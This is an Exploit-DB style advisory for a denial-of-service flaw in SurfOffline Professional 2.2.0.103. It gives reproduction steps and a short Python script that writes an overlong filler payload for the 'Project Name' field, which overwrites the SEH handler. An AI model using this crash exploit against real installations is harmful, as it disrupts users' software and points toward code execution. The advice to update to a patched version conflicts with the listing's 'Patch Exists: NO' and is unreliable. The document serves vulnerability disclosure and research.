Vendor: SurfOffline Professional
By: Chris Inzinga
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: 400
Product Name: SurfOffline Professional
Affected Version From: 2.2.0.103
Affected Version To: 2.2.0.103
Patch Exists: NO
Platforms Tested: Windows 7 SP1 (x86)
Year: 2019

SurfOffline Professional 2.2.0.103 – ‘Project Name’ Denial of Service (SEH)

This exploit triggers a denial-of-service vulnerability in SurfOffline Professional version 2.2.0.103. When a specially crafted payload is supplied as the 'Project Name' parameter, the program crashes and the SEH (Structured Exception Handling) value is overwritten.

Mitigation:

Update to a patched version of SurfOffline Professional.

Exploit-DB raw data:

# Exploit Title: SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)
# Date: 2019-12-18
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://www.bimesoft.com/
# Software Link: https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml
# Version: 2.2.0.103
# Tested on: Windows 7 SP1 (x86)

# Steps to reproduce:
# 1. Generate a malicious payload via the PoC
# 2. In the application set the 'Start Page URL' to any value, it doesn't matter.
# 3. Paste the PoC payload as the 'Project Name' and click 'next' and 'finish'.
# 4. Observe a program DOS crash, overwriting SEH

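#!/usr/bin/python

# 382 bytes of filler followed by two 4-byte marker values
payload = "A" * 382 + "B" * 4 + "C" * 4

try:
    # Write the payload to a text file so it can be pasted into the field
    fileCreate = open("exploit.txt", "w")
    print("[x] Creating file")
    fileCreate.write(payload)
    fileCreate.close()
    print("[x] File created")
except IOError:
    print("[!] File failed to be created")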